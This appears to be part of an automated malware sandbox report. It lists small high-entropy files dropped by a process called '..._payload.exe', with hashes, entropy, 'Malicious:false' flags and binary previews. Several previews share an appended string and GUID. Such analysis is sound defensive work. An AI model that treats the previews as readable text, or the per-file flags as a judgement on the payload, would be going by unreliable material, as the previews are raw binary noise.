                                                                                                Category:dropped
                                                                                                Size (bytes):738
                                                                                                Entropy (8bit):7.716095721570052
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:eQ78UpSxTbih4dtHz3kcOicaVh36SYKTVdeND87dUOa0GSmygJc3cii9a:eQ78xZbiaDLkpivVhKS75ENDCdUD8x3X
                                                                                                MD5:40964409DD64C756A5C6B54F8DB93CA5
                                                                                                SHA1:3E5BF913954A9B9EE84838C0C5FF553EF319E153
                                                                                                SHA-256:48258968CF799942A9BEE2064DB26B7F3F8A8B50816B1A1DE28237F4F10777FD
                                                                                                SHA-512:AF29CC5E0AC2F3DCB3502B8ABC87FA66D3623755F89DE5113903939F0B57A1E955A7DD580AA82FD69631B043744FB18CBA8345DF91F02AB4EAD8ECFC331206DB
                                                                                                Malicious:false
                                                                                                Preview:<?xml.ps...K:\.B..u.....fO...|.]..hj..s...Y...}Z..m...a..rPM.[.....D.B....B3.v. ..~..J.K./..;....F..Y.W<....z.....+...b....P[wO\.|..g...Guj....+I..+%.1..`....j..;..%......;\..?g..(I.X.rs\$Z.0...4a..%..?...D#..V-.j.7.#.M....'...i...h.:$.>..z....S.4P.-...g....a.CD.C.c....._.O....u..K].y.A...k.._..Z...~r.z.]...i...V0#...@......yA..a.....Pp.*d.(/.Oi.w..X|.CX.6....C&.f'..^S.g.~_..}>F..N....\.G>/....x..P........4.%.6J{.t.P.817=..[.r.t..'.l....B6.1QL1...E...XN9]]V8.B.......=.7.......0.S..I./*....\..<.g.8^..M.........h3...N.>.p..y....N.....wy.4~.g.Sn.Q..,b.^...O_....c,'......T..^ ....2...{i...4.z...>.&.D.pA..,..A.../.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1191
                                                                                                Entropy (8bit):7.806315175351125
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:V6pp4g2NpGFw6O/zAyKRpWlefGb7hyhiGZw8T0d6m14vSx3bD:V6p3R0l6GyD+514eLD
                                                                                                MD5:82784054901374AB5EF7D4FA40D79A10
                                                                                                SHA1:E8D962F63314572630922404FCFF5805D97EB909
                                                                                                SHA-256:E73AB7E706C1A351689742AD3B6B19F91A94022096BD3AE79585E017815799B8
                                                                                                SHA-512:997E7DA7267E5153AA264B4E2122A8733B96E03C9E91374347B11ACA0E5A48AF077E4E7B37E79C97C8AC30CECF619EAEF2D97ECA735D8C08438AC9BC53028B31
                                                                                                Malicious:false
                                                                                                Preview:<?xml.6..\..._.Q.T...G............!b..xa.u.T.~p<.R(....N...O.s.......h.p.......g...P...fx.......2Y.>A....9...z.<..6@JF..:.~9...gLXA.u..GDL..r..Me.M..T..:...Rq..psc..Bi.L.^.d......;....D....no..a?..-.A......G;...Ro.[...v....<.!...k....o.p%.&...;.s.......A.w.../.o.q}Ks..7...g%av..^...d8.E/.u2...W.f .g.T10.v..Oru......2G.;....oe...jt..X...*..K.U.d_F4E.l8.....M.Z..1...J.........|.9....q....l...D`....<A$.N..F..%S..Y..W.GYNr....Cv.}.. .A.W.s.2.(2...~.8..O2..49j...s.tf...z..\.k.K2...&Ug....F.....G..A.I...'...,~.X...0B....a(...~cm.R.rI.=t.....u?^..].BV.#..h.i.i.v.L'B...t..'{K...x......w..k.X.k........M7.mo....3>.....M..4..g.(IK....)cs..1.%.s.3....Zw..."....!.8..s.=M~e.:6.....\..p..o..0..-..a...:..m...J}.s.m..D.........a.@BRW...!...A6.._...h=..3..Q'^.g_.y-. ..%.. o..j..z..q7...".L..P.M.....5S.P.I.fD]....^o..,...p...go.XY>(..I.aDG..)Ij.'.6.....{@?5...).(..qB...#.1,..VR....Z....F.$~:.1.S.r...c"t..8L..%.?.TLC..5j3.#r.I^.B.N....Z..l..~...q4..L.;../..4..EY.+.Q
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1366
                                                                                                Entropy (8bit):7.846442946897381
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:62MgOYBmthhm2qwqZfkEpvg6UuDj+KgWMO/9Tl7EVUYmkEZNakw+6fHoreEGzgxn:ugOKmzhHFqA6UrD41OVU2EZwEYnEGwLD
                                                                                                MD5:DC1DC9705CE84F59258EC6F7339BAEC1
                                                                                                SHA1:1AD08EC195769D82A6F9C961F9184AE39F85C06E
                                                                                                SHA-256:37F37044FA7E551F726D0DC57B1EE1A7DB3E9F333AD5A9AC7C6A1CE727F8A4BC
                                                                                                SHA-512:3D2058FEF13109E8F7570628A850D7CB126DC69DB07792FD5EAC88DF1FBA30A45AE507DE7E8870506DD96C9CF102DD60FBF3AE12C8168D60DEB971E883579CAD
                                                                                                Malicious:false
                                                                                                Preview:<?xml.x.2.\.O.....C!&Nrw.\......x.(.\ph*@.8-...J=...=..p!.C0P.H.t...;.g.u.C....W..d..P.?..p....z..P.Yt.......,....)L.....k.6:)n..}x.....H..\....R.'....vc.|.M.6..j.b,.z.....8......9F/.......3`:$.3...........E...Y.O.........:.I..&Xw.,..q.......o.........(..=.#V..}X..J....w...r.x....9......FL*..B}.u...P..G...[.;..W.......&.N.'..d..b......Vc.1..E.$u..r...A.l.W......a + H..e,x1.:_...Dm.w..U.m...f..>...e...};.mI.....Lo..abY...Bu._.<P.z..BD.}w ..].'..V.4..Z.....a..-~..~..x/.c..sj....k.00{...zB.....r..o.}..l&....,.]9...qu..V...t..1.c0.Z...w..b..#.j..G!....p...K,...i...T!..9.#Df:...j..x.d7.{|..v.&u;E:..b._.l.E....v.._..qH/....o.>...7.....4.....u..(.>]<.....e..".T.k/...Z..q.z[.8.B..................g.........Z(.l..s.....UU:.3.`..w>?......h..du%..{!...4I'...:...&...=.;6 .y..3.4f....2H....ew...|ZX...s..2t5.S.....@.<Q[..'....X...5.`...O...'ms.2t{..r.I..o*...}.F?..FY...v..NU.....s....mq.,..E}C....G....._.y...a.l.)-..f..S.1..Y..#...v
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):728
                                                                                                Entropy (8bit):7.681677148447161
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:HLIN4Hl0F2mNLL4xqceRDfIjmnCS+66+y74svYAHIg8m7c+RiSgJc3cii9a:HLIEi2mNLwqcOQqCSR674svYpg8QFhxn
                                                                                                MD5:90B174CAE1ACE3825FAD78CA8CAA40CE
                                                                                                SHA1:B449BF2A9B8E9261C941FADE4FA932A10A163E74
                                                                                                SHA-256:8C4D662D0EFF2C2237EA5E2164893D1B89519971BA5D80EB0CBCD89EDB8AB298
                                                                                                SHA-512:BD0EB24E4732D9489EF0F850ADF7C3D5E17D3C0B5E8BC669B48F321A7A89E97D8740F3A60EBBC214846450A97E73F12465AFF8A6F5D48F58EB525926332C2C1F
                                                                                                Malicious:false
                                                                                                Preview:<?xml..?.\....R.%?.."=........d.ctl.@.,.q....8.......3]........=...4...7..!..{.e.h.>........,U..+..T@.k.........|......*.AX.*b;..+.,...Gy.1.Z..R.}q..,..>.."..c8{..."N...@.p.tZ.]..F....II"....\...Xk..;.*$..8.....2...^....D..O+..../F..RD5XeW._EZ.8}.e'.v.7..7........p.*..........X.D.....N...&@~G..T.B.-E...Pqt..M;..B....A..|..V(....-.lu<...:..0...5{#.....f./566.n.....Ran....l.C...q.(~8.......\F^....@..^...W.V...L.....9$....r.K.......O.j.....;...psaTp%.eLaeV..-R1..0.^.6...Sb).20...M.....F..Z.U..8.QZ..!.y..(..*I..6,.9]..*..cp.T.b.av..h.|<..?.ib'.r...;..Y.j...l..X#M........nl*......\...e..R..)KI.D.*0.X`.xY.Cq..G1...n.:..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1088
                                                                                                Entropy (8bit):7.805273292720283
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:5DQgBwMpIUwuTm2jvV897IMhdWrloAAB5x3bD:xJpI6SIv6dqohDLD
                                                                                                MD5:7592CF8A63251AFFD8FD1917EF5BD0FA
                                                                                                SHA1:5CAB2369518E18D28770B6EA3A305052FA60266D
                                                                                                SHA-256:0453B5F1848EB6F9E9AC44F2886A3383E6C10943DCA45EAEDC065B890015BAD5
                                                                                                SHA-512:DBD8F4A3202952282D7EB240C1AB518F48E126FC56BCE19E9D51EB9395918E8938F3E6D42B42AF31F4F6BB42E1425625D2E84A37AA4028BE105BA97459444967
                                                                                                Malicious:false
                                                                                                Preview:<?xml..g.,./...;e.;<...*..'...H.^....+?..'.c`h....8&.n....l.<.....K....P"l..K..."........3I.Y/.P._.I..,3M..s6..Q.B\t..k..\.1.:]r.2..{.btB..E`.......?......d..I_....<...RD.C.....(.8...VpV..-<<.(=(L..1.....>.8,.c..w^...5.a7j..Z....?...$.....^#y}........~f...I...i0..L.Z..U.H...EQ.[.Z].N..=]..g.M. .A .K.......d.S.b..0.....QT....![....Y...CJ...UQ:.l..N.\...h.>9_....,.6Py:.mz2..`.I.r..X.........;....tX.R..%..#.ZQ.......,..A[......./.m..^`.F...,.5...h..`.7.,.AF{E..>8....0..X......S.q..1Wl.....M.[G..,.5.M...%.....{.....x.........V.IbI.....z./..k......g..82.......'....Xvmx..s'.Z.Vp....3...mjn.Y+G....JX%...N(..efe.....*...v.mX=...k..~..pU3...<.%..9....Q1.C.....6M{C....G.......K&cn7.A.v..3U...E. '.!.aJ..10.1n..../.q.l.x.{v.d...Q.=..G..|s..]...j.....^.._..E._..w.@0y..q.....FM...R.+?1ix......$...m}I.Q.}.<].9.g....s$..L..<....U..... .{..............4+r-.*..{X...q.]..d..f....S.Kh;n&1.................d.....r..5~."...c|K.I....W...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):999
                                                                                                Entropy (8bit):7.770378048713847
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:nFEP56Ce2ocdPaAgaybXcVB9VKP+d9ut1PnZ5x3bD:SbocZaT9cVsGd6PnpLD
                                                                                                MD5:6D22397A534BAB343E961E04AF1289ED
                                                                                                SHA1:B436FD9FB6B30CB7E574108E21A5777F34AB1D79
                                                                                                SHA-256:231DE75B57F9739EB5242AD13FB678E92AA12BE2789CA27F7FC583A13AC32D03
                                                                                                SHA-512:C32291FDCFDAB61474CBB93C2D1775556B25F39298F2AB0758B962038460AD9B878861C5B7B9747B820DA568586B1E16E97218803CE2CAE54E0DF285A5695C36
                                                                                                Malicious:false
                                                                                                Preview:<?xml..O}.........6.R.......:.....Q.........L......T.. P.DXc.P...v.>@\...f...y.0)......O..v.].ya...V..)...f.yA..|..u.='=/.s....Y*..9.2z.:EMn...,8...q...80.....e.....ZU...j..9._.y&..#...w..i.....O$Ma"....Nq.".s..g.t.*c~..Y..i..\|.....NC.k.b.8yp.{..)X.<h.....F..."..K&.Z...ya6MG. !i......te.Hh...[....+........0.Wy.`...4..)..X% .BR.h.?.*...5..a.6..TE.[m...EN#.....T..)m.K;....."..x..m}.......k...Z4.|.!..'.....a..gF......H........7...M."...c.,1..4e\i....C...:.....N....6Ry9/.0.e.d.i.....9..).....6V]qWV.I.+. d.NV..[.b.75..=.a..9.S.D.rKQ[....q..~?..v..3:C.......k....2a.Ty..i....p......">..f...3.\w..?..0....{...%.K]n.4.v)......b\..bb..!.J..A.V......I..V./.f,.RS6..K.9@....J..._$.M....w).nW?.......<...1.2\v`..Q. .~c...x.....0....A..[.f..9%.wU33.L..f....u53A...F........A..fT.|.=....P...AM.\^t.....L.(.j.......F.....9)F.^.$..E.{..N..8...O;.T"S5.p=.v...)).zTkQ.y....4..m.Y*5J.,..tt.{..e|.T.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):4446
                                                                                                Entropy (8bit):7.951768145985851
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:wZNopbEubRhQhrrXxcA1d3S/9sOi1EPyxuT6AVW1+uU4gqr3:wZWvRKJxcmdA+EP7mAh4g43
                                                                                                MD5:3506FDBD1BF4FBE45EBAE3512A8E9205
                                                                                                SHA1:F2C4E83F6BF259BF60EC2C60D459AC92DACCED2F
                                                                                                SHA-256:BCF7A5ACE89823E3E30EC9B5537C02CDAA4C2ED3B335C6D61B1B71E820629C79
                                                                                                SHA-512:D2C165606399081590F95EB33E88141BAD6E87FCFBC0E594857FD5E1CDFBB0661ACC9B1E8317D8BCB7E40FFB023CE2FCE6DD9007EFE076B3BB0E8205644B167C
                                                                                                Malicious:false
                                                                                                Preview:<?xml..e...^..G.....}7....q..:..9.p.....U......\X......69p..2..md.,u9...u.....;\ . ...7..t ...Q...".0.`.R...r..a...E...)A.<]A.s.?./..h..)K.<S}.@.d%S.....qUF.#......\.-.N.#...f}I....x.%2.(B.-L..06..'....N....W~.../.....w.x..2.s.:$q.G^.....fA4..`.`..Y.....J...D.v.S.#=..6M. =... ..y..m.).c.8..I(.f0....v....g_.,.|..=+]...A...)d#..%...:.$.'....7...!.X1E....~fc.."...|..*.<+.'F6&xx....T.FJd.;.`.|q.DV.$J...!&..Nq...C` ...t..z.'..I.i......?D...........l-lS...t... \...sG.iGC....,..-.7.B/H. .....q.....?.t...]=.....-...[.S.hk9..*..a..|~..\.V4["g.O0.,.T. ..*_4.$x..{n....T:.T....0a*97.....pV.K.[.. ...30.I..t..;.~ky....:..vM...f..y..}..y?;....)..t~..-.....g..Lw..2_X`|.......@r.e;...+N....@Ty.g.RUEC.d.f..V..)..\W...X.*+...R........W.jq..e.8eb.T....T..5w.]...t.%.0....~.....b.....P..]h....D..A.E{8.m...G......#.l..n.8..i6..y_.].6.......^P....u]*Q.......?2.........Q0..^.r.U.CG...9.Q<tH..sK..I..'T..._...........YQaYy..3.9O.H...L.mc|.R.z..Q...g..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2306
                                                                                                Entropy (8bit):7.903896517608868
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:xOcXt9mm5RnCYNtY5Sx83bsbadP1RJWZ3XdZQFLD:xO+EKRCYo5C4bsbe9RU1do
                                                                                                MD5:51976AB56A6163E6EB8641CC42FD3836
                                                                                                SHA1:EF305D9E30D0F60F8BBDF8104D3A3F6A97E3D43F
                                                                                                SHA-256:196781A8B0B8FAF248A73A6C940FCA7905BE7132DC28ABA84624098C5977DE52
                                                                                                SHA-512:DA4365E144BB0E1A045B20A4796196F0CB13C4EF5DA40FFAD17954BD24CC203230B9B60B55F9D9CE715DD5439F94397D19DD504AFAB352CFFB8AA7F23F2CC2EB
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....U..'........j.Q..I..f.....8..f..U.G.C..5=_.....!8p9.9....K...4.*T.......J+.....k...X.+....8.kC....f.......#~v..)H....p.m....u....&l......e.... T..V.;4......p.#J..$h.z.......`....t..;Gj.B.Y.M....#...M?...r.....~...t)m....Y...._@ne..p....;E.7"...'=S..I,..O#..`....x"Jf..<..:.f..+....X..-;&.....j1..........uY..,..lx.9!.-..`.m...qz.o..jW..,E.@:]JE.J.%Z.;u.8>c..`......N=z..m.m..E..0DK....Vf.......... b..z..8v_.........t.{...0.gl*.L..!..;..Q.}.d..\.U......g.4../WS..^.N.bz...b..k6..0...m./..~.'..{q.g..&..t?!#.5....A....8c.X...;V..(..t.'S.....cYw.=L.E...U.I....hR..1...b..Dzl#.?3.Se..=.....1.jL .Q,:.U ...>.\L=X)c.../.s67..9.A ...7.....yw.9..r....X..B'.N2..HZ...d...v...s..P..V.H.Kn#T.h@..:.h7/I.u..x.:....3>...q.jN...V......s..g.|..nR.jUC...h..:.r..u.\...f~ .... .h.5r.......].....kr,....x..ZN.....6%XxZY;..x&....TRY^b.5..lv./e.s...)&IX........#.a...S..9.%..j..zU.......[^...D...3A....d....:.9.k*'..e..d.Q.Xr..a.?.;,.o.5c.Ql.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):2376
                                                                                                Entropy (8bit):7.924297315405262
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:EzCs50ZcuegiZppu/VrZ5zHVZ+lk8JY/sadHLD:uCs2egJ9LT3+PxuH
                                                                                                MD5:33113DB8E4A9499D42FD6D780569218E
                                                                                                SHA1:D6AFC9F9B6647B2173E17E3C887FA832BEA5F452
                                                                                                SHA-256:71E8D0D990B087217F3DA12151B17ABA6ED2478DCA7183DFB79072D14817ED73
                                                                                                SHA-512:9FE1963D0AF6F6DE0F6241E81E01DD26F245152A28C78B8B98FD4692F85D64A7817FA04820D77C4787D2A5039DE2753B2E4C9E16EBB97EB2AEAF51CD9F143502
                                                                                                Malicious:false
                                                                                                Preview:<?xml.....V.4..'X.Z.s..>.7.....1..;.+...,7..MZ.pa...(4.T.HL.}.i.*1..*%.XZ..y.(...F...3Y0.....0"~...;.0....a.....$>?.7.=l`..F.:h .n..S+6'.......Q-h..4D.H...h..8..b...W........x.nV...T..Y.8...=.dq...0..Q%.......|.`.....i......D...C...e...<=......k.W....~. ..........B..R...).U.....|.f........P(?.A....Y_]]K.....7_....G........K..?.:.k..6./.."/h...Z..........%.9.f.7..g/..E[..v.J....Y]3"....?h._..l;...S....4.1.....u.\...B".cYU.......Tr..L....Rq}.O..7.Nc..?.9&.)v..$E.W...|...jV..A..XN=....H.N...dF?..5c.9...!.B.........C.....7$.,Uk.E......*u.~Z....]9d.(*......t....tc.....8.1.."%.1. i;E.(...A~..<.h{...,.X...b..X1.).fC.H@.G..2h.-(.U......-E.q....@.....R...5..`.!.B{U..N..$.....Y5...^.L.v[2.,..:~..`..I&.;.o.'...W.xs4DT..$rX`5......=.....\..,.*..$m.t+..P..>....Z...S.u.N.;....|...ma#....`.=..t....-...:.*!..j{.q.>....c+X.9.../v..Nz.'.e..J.Xng..2Q..D..9!..?.........'.x..).u........7z.....c..8..\...;...[f#..,.E..Hu>o..X..2...x".....?#..@uH.r.@.$d..;.O.K
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1043
                                                                                                Entropy (8bit):7.7732465432035704
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:BprJiwPMNyDHRDpTAH/ceYXICBRuH8Ovsna6QF3u62Jp8Nx3bD:BpduyDxlTAH/ceY1BRuH8Oaanu62oLD
                                                                                                MD5:F36503B9FFA1E69C7D4A6E12B0F90F7A
                                                                                                SHA1:8D52452E7A5EC56A69E803A3FE6EE9AD840CC318
                                                                                                SHA-256:6BA38F86F471EB28B94DE4A598682564624F913DB11D78C84E81CA9528962690
                                                                                                SHA-512:196B885A037C173BB59912ABFAF2D38BFEFEEC2190BDCEA8166B4A181021346084EF214E46B270EF4C6FA7068E88AA1FBCDB7E6650851B92FF8B3537F0EA0C37
                                                                                                Malicious:false
                                                                                                Preview:<?xml...aD....k.U._M..7.m5"...%...]......f,..p..w./...(,hi..i..JQ....c3....jR...r.^....F.T~...f8.......K....!C.L..v.a[..}q2$G...'....X?......'....EJ.SV.5...6n^......N .9.*\.(P.../........(j....~w......'p.]_..l.....QW...%a..gC.6F<.W..M.......Uxu92.%.7.S..I.....}.o.i.#.E.gP..&...E.....6..2..e.2.2.i....L...... .o.IKv...$l......<r.i.:.:..B......U7j01.O.0[...=...<~.....i."..B...jF.8..t..2.zx...~.$n._&..J...Kd`.............Z.......7....{..h.r...N.Bh..6.RW$.>.....Bb.D..?........9S..T...)..F.Y./.sQ..+)...=HJ,...D...(.JW.C.L.:- u.*..L"7kd.#..l.....n..A..{...<%.JW.l...0.C..._4.T...%6./m!...r.i....u.;.-..y.7.{^g/D...Q1.!<<6.M..'r..}.j..5K.n.....?^..}Hb....Z..v9.....f....O<*.%.H...#.DY.o.X.t...o.Sz.P..s.=.'........4y`N..1j`...cR....N.O..H.....?][R".K.q...1Xc....M.W....r.0N.x..,5....Y.......kB.._r......bt..IO.....5.#..V.}. 0...~.(.C..y.g.`tr.LW%,.7._DC...<7..C........g.v..Q..c...s.).....<..;..Ad...1.......NHtBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):961
                                                                                                Entropy (8bit):7.740132195812211
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:lwog3ZFM3M+NlWxd6zAXGcYUNHRATyBVPBAtrPQGagx3bD:CpFd2axATyBVMrPWMLD
                                                                                                MD5:AB1FD4BC0EA26D0104F9084258102E95
                                                                                                SHA1:9F4BFBF1E48F899E406291A0CF9D296163B53714
                                                                                                SHA-256:DAA73385C94F5F53D448835FCA317ABC2B860F964EA35C1972E4543276D920BC
                                                                                                SHA-512:6C0C3E26C560C5C18A668ABBC69C8A643C305B2C02F8E0B329CE057F5F691311F72432E2B3B906E4055F21953CE58A6F20E20953EE9E086E6BB3CE20319A8B38
                                                                                                Malicious:false
                                                                                                Preview:<?xml.......z.@.w.S.|..c}.;..._.....^M....oi..yw.I.....(r..'.....B...z.R.....d.8.8>d..0..d.X..Fg...GW.......}b,.A.mDs...........A._W5e.{W..L.....p...+.<...<2.r...~"..9<.8H.7...s1E....}.SS...z.)..\yw......5Eg)..?..>....0..).'.........6 G.....M..s.[e.(....<....[...a.....i..Z.By.<.e.A.`...?.x..do..'.Y.\*...m..R..Z..Kd._..>c...eR..U.. y.k.U......./3_-..xh.bTEo.B#..g.._jxe.........L.Y.#.L$.!f.#..._.*.....Y..M._....{...(.a...5$k.r@n....l.8+..eI.....|...4[.c!..q7...~.R..d....+.RU.G]..X.1.z..]...u.D..Rb:...g(.A....f>.o.}.".Q.&B:.;.N.Y{2.sL{.VX$N;../.ej...C.p.\q..Az...../.ia).5sB.<...g..W.~.V.^....1=:..H....(...$E{.;o..$~?zw.v......(B.........}.#..w}.S. .\..1...iVy.W.r/.$..)..4.c.1'..A...,1f8z..L8F.K.,.i.g;....<..A8...>A.U...%&:.P.`..=ZP<5....jy]WU*S..!......1..F.l..e....FeR.. h(......p#=u.......IK.^.....BG..e..d.N.....y.R]*.[|.......8.v.<.1.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1126
                                                                                                Entropy (8bit):7.809008863908792
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:WG0dM2mb+Aw3xHY8HAoL0Ws4uk1aKxaUxfga4OZUd2ETagYAk1My7ED+mfuCx/ei:WPdmqAwBFAfWsoAcaUxfwQUdHagYA+x+
                                                                                                MD5:43DF8F654C3AD39AFDCFCCCB5ECD6E36
                                                                                                SHA1:531C8DAA095E6AE3A97579061DBBDD9B364AB182
                                                                                                SHA-256:DA33ECFA0D3C0A3632077206D46A86E07E3D72F1C67A26445E5618B13EE8C43D
                                                                                                SHA-512:21FC5F761D18603A0FE5FA10B2A32C3980B8BFEA6762FB64D9DC9495FADA0C2D90E0DD1FDCD411FD7B548B30A938272D3E955A5BD6B8A977488E3B14B3E6461A
                                                                                                Malicious:false
                                                                                                Preview:<?xml.C...H.`.k.......&@4...'...P..$.....G].8..~<..=.R...vI...B.=.......;T.cV.f.....1f....>....C...h.SgF.E.-L9r..2......?....x.5.......*..J'....U.o...d...%.38jt...".uI.j.y.A.l...m..q..T..xG...k...1*...lh......]T...hB.v.....h..\.oS.dgy..f.w=.5......!y.G....h...3.......R.wa...s...vL..@.8u.M.a.z....4..G..K.....B3.~../..N.).....o.X.Y.S?.%..+...s]...u. Z...m....I.U.Q.L.s5.$uH.6|..1..CC&H......>n}.=s.=HVI.Hx.Z'..3....MT..}../=.N.Iy.a..Ow.#.5z..:....T6PY....h..).........Y..2}.9. . .Yq....W.K0.q/.$..6...0IS...l....~?u...>.......gIt\'........<...X.. .I&r......k ./F2....%D.t.........A..<..4....P.=....k.....i<].=.3..C..d*+I.J...H.....iJ..s..J..Z..wg1.lg.G.....W%P.1.o.Lu...-.+..t.ug<\.h4W3..&ZN.V.....<.c...b....y(H....^....K..O..}..e/p..b........h..'...`...Nl..j.j....y.....i ...C..[..A...,...C....Ds....{+.........mI.aV;....#nX./x...CA.X....#.G"2\..G.m...)mN....*B.....N.....W....n...B`{.zq%..F......4..Lv.6P...09...Z...8A#.....E8....(UM.....WsY...3r
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1662
                                                                                                Entropy (8bit):7.887274700346083
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:r9mAUenDJDoVeTtVjBPEViTwGei+zsAzqz081PLD:JmqsVeHOpGD
                                                                                                MD5:AE6CBC96715A2A514D15136BEBF64500
                                                                                                SHA1:E851989E9928DF1DCD31212B6DAFDA6F7669A729
                                                                                                SHA-256:D2C2AB7FA6C5DA321852E5A7BBD1E96C8BF10D8AF8FD2BC17BD24296CBFE6064
                                                                                                SHA-512:9593EC1D6A308DB40EA6909179CA6EE2180E94308872509C48C838DFB803AA1ADAB1C4FEE84960ABB183810480C63645B55FBC22F7B9BB244774D11606C76F65
                                                                                                Malicious:false
                                                                                                Preview:<?xml...f..N+.<..Y.m.'.b.....D...Z....Z....Q2|D.Q.......=$j....G.*..V...~s..........2./......p........b.'m..Qf....E..............[~J13.e.Mz .37...4.g..b.4r{.PA.%8....b..v.h^Lp.}.'..j.I....wuAg.3.y..]...~...K...U..ry...:..]....'{A.E.X@M...C..^.0`$.g.6.@.9.,.J...j.0....GD.+.(|f.r....1s-.u...O.k....a"g1...@v.....d=.m..+w...<.E..^N(z.ps.{.....~.....wr...".JCe.'..[....T.zDo.JM.......&.d2}.`...*........).d.J...i....*.W.....t^K.WK.5.~..\.7.0..lO....S.t.+v...cs^.....r.....c[..].>.....V.~EQk........s7.[6/.cQ...cB.......LZ./.zF....U.TEHZ....j.....t.VGBB@..d.v.L....P..PUV93...%....n.<.".S!.....;..fa...Uxb.lVX......r..f(.D..D9.-..\\..(.n....../.2.Q[..tw.......HWp.m[w80.E.Zu..I..l...e.....Y....y...([i...[..SM...U.s.~.Iv...v\>"D.2.d...]....F.x. >..U[.@#....&...5C..W...G...p:...8.xt...=.......R.CU+.............D."..04..;l...=Cz*.'..g.....n......9..]Ie....[6......L.c^2.!..{...........B~_....Q.(r...w..\..>.+...Rsu84...W.B.}H....Sp.JU..E.S!)]...q}.&.6..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):831
                                                                                                Entropy (8bit):7.6738401803365255
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:LzPgrFhgKPf01Mck9W8UjsdjzsE0q0G1x3bD:LzEhJH0hgdjwE0YfLD
                                                                                                MD5:AFB00ED0E76D1410E70D2C31104F5ADC
                                                                                                SHA1:A70776AF060C275D55F9BF70B6570728F4013769
                                                                                                SHA-256:11F3D2760C0CEAC30D3FEB8D1FB989522EB0132AEE7490BAD866F8105A644729
                                                                                                SHA-512:9DA7FF2EB28EDF1F1F49C761CB62334F365D3F368E7949EFB210080AFCD363BF0A1C8B73A7863BFF71C89D34B116D2FC8F4E317CD10A5955BDB5D306FA32A303
                                                                                                Malicious:false
